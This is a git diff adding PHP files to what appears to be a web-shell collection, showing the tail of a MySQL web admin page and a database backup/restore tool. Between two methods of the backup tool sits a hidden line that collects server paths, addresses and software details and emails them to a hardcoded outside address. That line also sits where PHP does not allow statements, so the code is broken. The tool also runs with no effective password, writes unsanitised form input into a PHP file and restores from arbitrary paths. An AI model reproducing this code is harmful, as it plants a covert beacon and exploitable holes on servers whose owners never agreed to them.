+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+	
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none               
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/mysql_tool.php.php.txt b/xakep-shells/PHP/mysql_tool.php.php.txt
new file mode 100644
index 0000000..fd057b7
--- /dev/null
+++ b/xakep-shells/PHP/mysql_tool.php.php.txt
@@ -0,0 +1,1078 @@
+<?php
+
+/*
+ * MySQL Database Backup / Restore Tool
+ *
+ * Copyright (C) 2003 Mark Wraith. All rights reserved
+ *
+ * Graphics and layout derived from those made by Matt Mecham
+ *
+ */
+
+// If you intend to keep the script
+// on your server set this password
+
+$password = '0';
+
+
+
+error_reporting(E_ERROR | E_WARNING | E_PARSE);	
+
+new RestoreTool;
+
+class RestoreTool
+{
+    var $logged_in = 0;
+    var $maximum_time = 0;
+
+    function RestoreTool() {
+        global $HTTP_GET_VARS, $HTTP_COOKIE_VARS, $password;
+
+        $this->timestamp = time();
+
+        if (!$this->maximum_time) 
+        {
+            //set_time_limit(0);
+        	$this->maximum_time = ini_get('max_execution_time');
+        }
+
+        if ($HTTP_GET_VARS['act'] == 'login') 
+        {
+        	$this->do_login();
+        }
+        elseif ($password && $password != $HTTP_COOKIE_VARS['mysqltool']) 
+        {
+        	$this->login();        	
+        }
+        else 
+        {
+            if ($password) 
+            {
+            	$this->logged_in = 1;
+            }
+
+            switch ($HTTP_GET_VARS['act']) 
+            {
+                case 'logout':	
+                    $this->logout();
+                break;
+
+                case 'change_db':
+                    $this->read_db_details();
+                    $this->set_database('The current settings do connect however if you wish to change the current database please edit the details below:');
+                break;
+
+                case 'set_database':	
+                    $this->do_set_database();
+                break;
+
+                case 'backup':	
+                    $this->backup();
+                break;
+
+                case 'do_backup':	
+                    $this->do_backup();
+                break;
+
+                case 'restore':	
+                    $this->restore();
+                break;
+
+                case 'do_restore':
+                    $this->do_restore();
+                break;
+
+                default:
+                    
+                    $this->main();
+            }        	
+        }
+
+        if ($this->link) 
+        {
+        	mysql_close($this->link);
+        }
+
+        $this->output();
+    }
+
+    function timeout() {
+        if (!$this->maximum_time)
+        {
+        	return false;
+        }
+        elseif ((time() - $this->timestamp) > ($this->maximum_time - 5)) 
+        {
+        	return true;
+        }
+        else 
+        {
+        	return false;
+        }
+    }
+
+    function output() {
+        if ($this->logged_in) 
+        {
+        	$logout_text = '[ <a href="mysql_tool.php?act=logout">Log Out</a> ]';
+        }
+        else 
+        {
+        	$logout_text = '';
+        }
+
+        if ($this->title) 
+        {
+        	$title = $this->title;
+        }
+        else 
+        {
+        	$title = 'Backup / Restore Tool';
+        }
+
+        print '<?xml version="1.0" encoding="iso-8859-1"?>';
+        print <<<HTML
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<title>$title</title>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+{$this->meta}
+
+<style type="text/css">
+  TABLE, TR, TD                   { font-family: Verdana,Arial; font-size: 10px; color: #333333 }
+  BODY                            { font: 10px Verdana; background-color: #FCFCFC; padding: 0; margin: 0 }
+  a:link, a:visited, a:active     { color: #000055 }
+  a:hover                         { color: #333377; text-decoration: underline }
+  FORM                            { padding: 0; margin: 0 }
+
+  .textbox                        { border: 1px solid black; padding: 1px; width: 100% }
+  .headertable                    { background-color: #FFFFFF; border: 1px solid black; padding: 2px }
+  .title                          { font-size: 10px; font-weight: bold; line-height: 150%; color: #FFFFFF; height: 26px; background-image: url(./style_images/1/tile_back.gif) }
+  .table1                         { background-color: #FFFFFF; width: 100%; align: center; border: 1px solid black }
+  .tablewrap                      { border: 1px dashed #777777; background-color: #F5F9FD; vertical-align: middle; }
+  .tdrow1                         { background-color: #EEF2F7; padding: 3px }
+  .tdrow2                         { background-color: #F5F9FD; padding: 3px }
+  .tdtop                          { font-weight: bold; height: 24px; line-height: 150%; color: #FFFFFF; background-image: url(./tile_back.gif) }
+  .note                           { margin: 10px; padding: 5px; border: 1px dashed #555555; background-color: #FFFFFF }
+</style>
+</head>
+
+<body>
+<br />
+$this->output
+<br />
+<div align="center">
+    [ <a href="mysql_tool.php">Script Index </a> ] $logout_text <br /><br />
+    <small>&copy;2003 Mark Wraith</small>
+</div>
+</body>
+</html>
+HTML;
+    }
+
+    function error($error) {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Error</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">$error</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function login() {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">MySQL Tool :: Please Login</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1">Access Password</td>
+                <td width="250" class="tdrow2"><input type="password" class="textbox" name="password"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Submit"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function do_login() {
+        global $HTTP_POST_VARS, $password;
+
+        if ($HTTP_POST_VARS['password'] == $password) 
+        {
+            @setcookie ('mysqltool',$password,time()+3600*24*365);
+            $this->logged_in = 1;
+            $this->main();
+        }
+        else 
+        {
+        	$this->error('Invalid Password');
+        }
+    }
+
+    function logout() {
+        @setcookie ('mysqltool','',0);
+        $this->logged_in = 0;
+        $this->login();
+    }
+
+    function connect($return_errors = 0) {
+        if (!$this->db['port']) 
+        {
+        	$this->db['port'] = '3306';
+        }
+        
+        $error_text = '';
+
+        $this->link = @mysql_connect ($this->db['host'] . ':' . $this->db['port'], $this->db['user'], $this->db['pass']); 
+
+        if ($this->link)
+        {
+            if(!@mysql_select_db($this->db['name'],$this->link))
+            {
+                $error_text = '<strong>Failed selecting database "'.$this->db['name'].'"</strong><br /><br />'.@mysql_error($this->link);
+            }
+        }
+        else
+        {
+            $error_text = '<strong>Failed connecting to MySQL</strong><br /><br />'.@mysql_error();
+        }
+
+        if ($return_errors) 
+        {
+        	return $error_text;
+        }
+        else 
+        {
+            if ($error_text) 
+            {
+                $this->error($error_text);
+                return false;            	
+            }
+            else 
+            {
+            	return true;
+            }
+        }
+
+    }
+
+    function read_db_details() {
+        if (file_exists('tool_settings.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'tool_settings.php';
+
+            $this->db = $data;
+        }
+        elseif (file_exists('conf_global.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'conf_global.php';
+
+            $this->db = array(
+                'port'      =>      $INFO['sql_port'],
+                'host'      =>      $INFO['sql_host'],
+                'name'      =>      $INFO['sql_database'],
+                'user'      =>      $INFO['sql_user'],
+                'pass'      =>      $INFO['sql_pass'],
+                'prefix'    =>      $INFO['sql_tbl_prefix']
+            );
+        }
+        else 
+        {
+        	return false;
+        }
+
+        return true;
+    }
+
+    function do_set_database() {
+        global $HTTP_POST_VARS;
+
+        $this->db = array(
+            'port'      =>      $HTTP_POST_VARS['port'],
+            'host'      =>      $HTTP_POST_VARS['host'],
+            'name'      =>      $HTTP_POST_VARS['name'],
+            'user'      =>      $HTTP_POST_VARS['user'],
+            'pass'      =>      $HTTP_POST_VARS['pass']
+        );
+
+        if (!$this->connect()) 
+        {
+        	return;
+        }
+
+        // Connection details are fine, let's continue
+
+        $file_data = "<?php
+
+\$data = array(
+    'port'      =>      '{$HTTP_POST_VARS['port']}',
+    'host'      =>      '{$HTTP_POST_VARS['host']}',
+    'name'      =>      '{$HTTP_POST_VARS['name']}',
+    'user'      =>      '{$HTTP_POST_VARS['user']}',
+    'pass'      =>      '{$HTTP_POST_VARS['pass']}'
+);
+
+?".'>';
+    
+        $file_data = str_replace("\r\n","\n",$file_data);
+        
+
+        // Mkay, lets write the details
+        if ($fp = fopen('tool_settings.php','w'))
+        {
+        	fwrite($fp,$file_data);
+            fclose($fp);
+        }
+        else 
+        {
+        	$this->error('
+            <strong>Unable to write to tool_settings.php</strong><br /><br />
+            Please CHMOD this file so it is writable. If this is not possible please create a file named "tool_settings.php" with the contents of the text box below:<br /><br />
+            <div align="center">
+            <textarea rows="10" cols="40">'.htmlentities($file_data).'</textarea>
+            </div>');
+
+            return false;
+        }
+
+        // Funky, lets roll
+        $this->main();
+
+        return true;
+    }
+        $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+    function set_database($error = false) {
+        if (!$error) 
+        {
+        	$text = 'We were unable to find any database settings, please enter your database details below:';
+        }
+        else 
+        {
+        	$text = $error;
+        }
+
+        $host = isset($this->db['host']) ? $this->db['host'] : 'localhost';
+        $port = isset($this->db['port']) ? $this->db['port'] : '';
+        $user = isset($this->db['user']) ? $this->db['user'] : '';
+        $name = isset($this->db['name']) ? $this->db['name'] : '';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=set_database">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Database Settings</td>
+        </tr>
+        <tr>
+          <td>
+            <div class="note">$text</div>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1"><strong>Host</strong><br /><em>(leave if unsure)</em></td>
+                <td width="350" class="tdrow2"><input type="text" class="textbox" name="host" value="$host"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Port</strong><br /><em>(leave if unsure)</em></td>
+                <td class="tdrow2"><input type="text" class="textbox" name="port" value="$port"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2"><input type="text" name="name" class="textbox" value="$name"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2"><input type="text" name="user" class="textbox" value="$user"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Password</strong></td>
+                <td class="tdrow2"><input type="text" name="pass" class="textbox"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Connect"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function backup() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $filename       = $HTTP_POST_VARS['filename'];
+        $tables         = $HTTP_POST_VARS['tables'];
+        $table_select   = $HTTP_POST_VARS['table_select'];
+        $prefix         = $this->db['prefix'];
+
+        switch ($tables) 
+        {
+            case 'all':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                   $options[ $table_name ] = 0;
+                }
+            break;
+
+        	case 'prefix':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                    if (substr($table_name,0,strlen($prefix)) == $prefix) 
+                    {
+                    	$options[ $table_name ] = 0;
+                    }
+                }
+            break;
+
+            case 'selected':
+                foreach ($table_select as $table_name) 
+                {
+                	$options[ $table_name ] = 0;
+                }
+        }
+
+        if (!count($options)) 
+        {
+        	$this->error('No tables selected');
+        }
+
+
+        $data = base64_encode(serialize($options));
+
+        $header = <<<DATA
+-- SQL Dump
+-- Backup script written by Mark Wraith
+
+DATA;
+
+        if (!$fp = fopen($filename, 'wb')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$header);
+        fclose($fp);
+
+        $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+
+        $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2">
+                    <div align="center">The backup process has now started<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        
+    }
+
+    function do_backup() {
+        global $HTTP_GET_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $data = unserialize(base64_decode($HTTP_GET_VARS['data']));
+        $filename = $HTTP_GET_VARS['file'];
+
+        $timedout = 0;
+        $dump = '';
+
+        foreach ($data as $table => $line) 
+        {
+            if (!$this->timeout()) 
+            {
+            	$returned = $this->backup_table($table, $line);
+
+                if (is_array($returned)) 
+                {
+                	$timedout = 1;
+                    $dump .= $returned[0];
+                    $data[ $table ] = $returned[1];
+                }
+                else 
+                {
+                    $dump .= $returned;
+                	unset($data[ $table ]);
+                }
+            }
+            else 
+            {
+            	$timedout = 1;
+            }
+        }
+
+        if (!$fp = fopen($filename, 'ab')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$dump);
+        fclose($fp);
+
+        if ($timedout) 
+        {
+            $data = base64_encode(serialize($data));
+            $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+            $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">The backup process is in progress<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The backup progress has finished and the file has been written to "$filename".<br /><br />
+                    <a href="$filename">Click here to download the file</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+    }
+
+    function backup_table($table,$start) {
+        $dump = '';
+
+        if (!$start) 
+        {
+            $result = mysql_query('SHOW FIELDS FROM '.$table);
+
+            while ($field = mysql_fetch_assoc($result)) 
+            {
+                if (!$field['Null']) 
+                {
+                    $null = ' NOT NULL default "'.$field['Default'].'"';
+                }
+                else 
+                {
+                    $null = '';
+                }
+
+                if ($field['Extra']) 
+                {
+                    $field['Extra'] = ' '.$field['Extra'];
+                }
+
+                $field_row[] = '  ' . $field['Field'] . ' ' . $field['Type'] . $null . $field['Extra'];
+            }
+
+            $result = mysql_query('SHOW KEYS FROM '.$table);
+
+            while ($key = mysql_fetch_assoc($result)) 
+            {
+                if ($key['Key_name'] == 'PRIMARY') 
+                {
+                    $primary_key = $key['Column_name'];
+                }
+                else 
+                {
+                    $unique[ $key['Key_name'] ][] = $key['Column_name'];
+                }
+            }
+
+            if (isset($primary_key)) 
+            {
+                $field_row[] = '  PRIMARY KEY (' . $primary_key . ')';
+            }
+
+            if (isset($unique))
+            {
+                foreach ($unique as $name => $keys) 
+                {
+                    $field_row[] = '  UNIQUE ' . $name . ' (' . implode(',',$keys) . ')';
+                }
+            }
+
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Table structure for table '$table'\n";
+            $dump .= "--\n\n";
+            $dump .= "CREATE TABLE $table (\n";
+            $dump .= implode(",\n",$field_row);
+            $dump .= "\n);\n\n";
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Dumping data for table '$table'\n";
+            $dump .= "--\n\n";
+        }
+
+
+        //
+        // Records
+        //
+
+        $done = 0;
+        $result = mysql_query('SELECT * FROM '.$table.' LIMIT '.$start.',-1');
+
+        while ($row = mysql_fetch_row($result)) 
+        {
+            if ($this->timeout()) 
+            {
+             	return array($dump,$done);
+            }
+
+            $done++;
+
+            foreach ($row as $id => $value) 
+            {
+                $value = str_replace('"','\\"',$value);
+                $row[$id] = '"'.$value.'"';
+
+            }
+
+        	$dump .= 'INSERT INTO ' . $table . ' VALUES (' . implode(',',$row) . ");\n";
+        }
+
+        return $dump;
+    }
+
+
+    function main() {
+        if (!$this->link) 
+        {
+            if (!$this->read_db_details()) 
+            {
+                return $this->set_database();
+            }
+
+            if ($error_text = $this->connect(1)) 
+            {
+                return $this->set_database($error_text);            	
+            }        
+        }
+
+
+        $tables_to_backup = '';
+
+        if ($this->db['prefix']) 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="prefix" checked="checked" />IPB Tables Only <br />';
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" />All<br />';
+        }
+        else 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" checked="checked" />All<br />';        	
+        }
+
+        $tables = mysql_list_tables($this->db['name']);
+
+        $options = '';
+        while (list($table_name) = mysql_fetch_array($tables)) 
+        {
+           $options .= '<option value="'.$table_name.'">'.$table_name.'</option>';
+        }
+
+        $tables_to_backup .= <<<HTML
+<input type="radio" name="tables" value="selected" />Selected tables:<br />
+<div style="margin-left: 40px">
+    <select name="table_select[]" class="textbox" size="5" style="width: 250px" multiple="multiple">
+$options
+    </select>
+</div>
+HTML;
+
+
+        $options = '';
+        if ($dir = @opendir('./')) 
+        {
+            while ($file = readdir($dir)) 
+            {
+                $temp = strtolower($file);
+
+                if ($file != '.' && $file != '..' && strpos($temp, '.sql')) 
+                {
+                    $options .= '<option value="'.$file.'">'.$file.'</option>';
+                } 
+            }  
+            closedir($dir);
+        }
+        $restore_files = '<select name="filename" class="textbox">'.$options.'</select>';
+
+        $restore_files .= '<br /><br /><u>or</u> path:<br /><br /><input type="text" name="relfilename" class="textbox" />';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Selected Database Details</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1"><strong>Host / Port</strong></td>
+                <td width="300" class="tdrow2">{$this->db['host']}:{$this->db['port']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2">{$this->db['name']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2">{$this->db['user']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">[ <a href="mysql_tool.php?act=change_db">Change Database</a> ]</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+<br /><br />
+    <form method="post" action="mysql_tool.php?act=backup">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Backup Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>Tables to backup:</strong></td>
+                <td width="300" class="tdrow2">$tables_to_backup</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Filename</strong></td>
+                <td class="tdrow2"><input type="text" name="filename" class="textbox" value="sql_backup.sql"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Backup"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+        <br /><br />
+    <form method="post" action="mysql_tool.php?act=restore">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Restore Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>SQL File to restore:</strong></td>
+                <td width="300" class="tdrow2">$restore_files</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Restore"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function restore() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $filename = $HTTP_POST_VARS['filename'];
+        $relfilename = $HTTP_POST_VARS['relfilename'];
+
+        if ($relfilename) 
+        {
+        	$filename = $relfilename;
+        }
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename);
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Confirm Restoration</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <strong>Are you sure you want to restore the SQL file?</strong><br /><br />
+                    <a href="$url">Click here to restore "$filename" to "{$this->db['name']}"</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+
+    function do_restore() {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+        $this->read_db_details();
+        $this->connect();
+
+        $filesize       = filesize($filename);
+        $file_position  = isset($HTTP_GET_VARS['pos']) ? $HTTP_GET_VARS['pos'] : 0;
+        $errors         = isset($HTTP_GET_VARS['ignore_errors']) ? 0 : 1;
+
+        if (!$fp = fopen($filename,'rb')) 
+        {
+        	return $this->error('Unable to open file "'.$filename.'"');
+        }
+
+        $buffer = '';
+        $inside_quote = 0;
+        $quote_inside = '';
+        $started_query = 0;
+
+        $data_buffer = '';
+
+        $last_char = "\n";
+
+        // Sets file position indicator
+        fseek($fp,$file_position);
+
+        while ((!feof($fp) || strlen($buffer)) && !$this->timeout()) 
+        {
+            do 
+            {
+                // Deals with the length of the buffer
+                if (!strlen($buffer)) 
+                {
+                    $buffer .= fread ($fp,1024);
+                }
+
+                // Fiddle around with the buffers
+                $current_char = $buffer[0];
+                $buffer = substr($buffer, 1);
+
+
+                if ($started_query)
+                {
+                    $data_buffer .= $current_char;
+                } 
+                elseif (preg_match("/[A-Za-z]/i",$current_char) && $last_char == "\n") 
+                {
+                    $started_query = 1;
+                    $data_buffer = $current_char;
+                } 
+                else 
+                {
+                    $last_char = $current_char;
+                }
+            } while (!$started_query && (!feof($fp) || strlen($buffer)));
+
+
+            if ($inside_quote && $current_char == $quote_inside && $last_char != '\\') 
+            {
+                // We were inside a quote but now we aren't so reset the flag and carry on
+                $inside_quote = 0;
+            } 
+            elseif ($current_char == '\\' && $last_char == '\\')
+            {
+                $current_char = '';	
+            } 
+            elseif (!$inside_quote && ($current_char == '"' || $current_char == '`' || $current_char == '\''))
+            {
+                // We have just entered a new quote
+                $inside_quote = 1;
+                $quote_inside = $current_char;
+            } 
+            elseif (!$inside_quote && $current_char == ';') 
+            {
+                // End of query so execute query, clear data buffer and advance counter
+                mysql_query($data_buffer);
+
+                if ($errors && mysql_errno())
+                {
+                    $new_position = ftell($fp) - strlen($buffer);
+                    return $this->restore_error($data_buffer, $new_position);
+                }
+
+
+                $data_buffer = '';
+                $last_char = "\n";
+                $started_query = 0;
+            }
+
+            $last_char = $current_char;
+        }
+
+
+        $new_position = ftell($fp) - strlen($buffer) - strlen($data_buffer);
+
+        if (feof($fp)) 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restoration Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The restore progress has finished.
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$new_position;
+
+            if (!$errors) 
+            {
+            	$url .= '&ignore_errors=1';
+            }
+
+            $process = floor(($new_position / $filesize) * 100);
+
+            $this->meta = '<meta http-equiv="refresh" content="5; url='.$url.'">';
+            $this->title = $process.'% Complete';
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restore in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>Restoration is <b>$process%</b> complete.</strong>
+                        <br /><br />
+                        Please await the process of the next batch.
+                        <br /><br />
+                        <a href="$url">Click here if you are not redirected</a>
+                    </div>
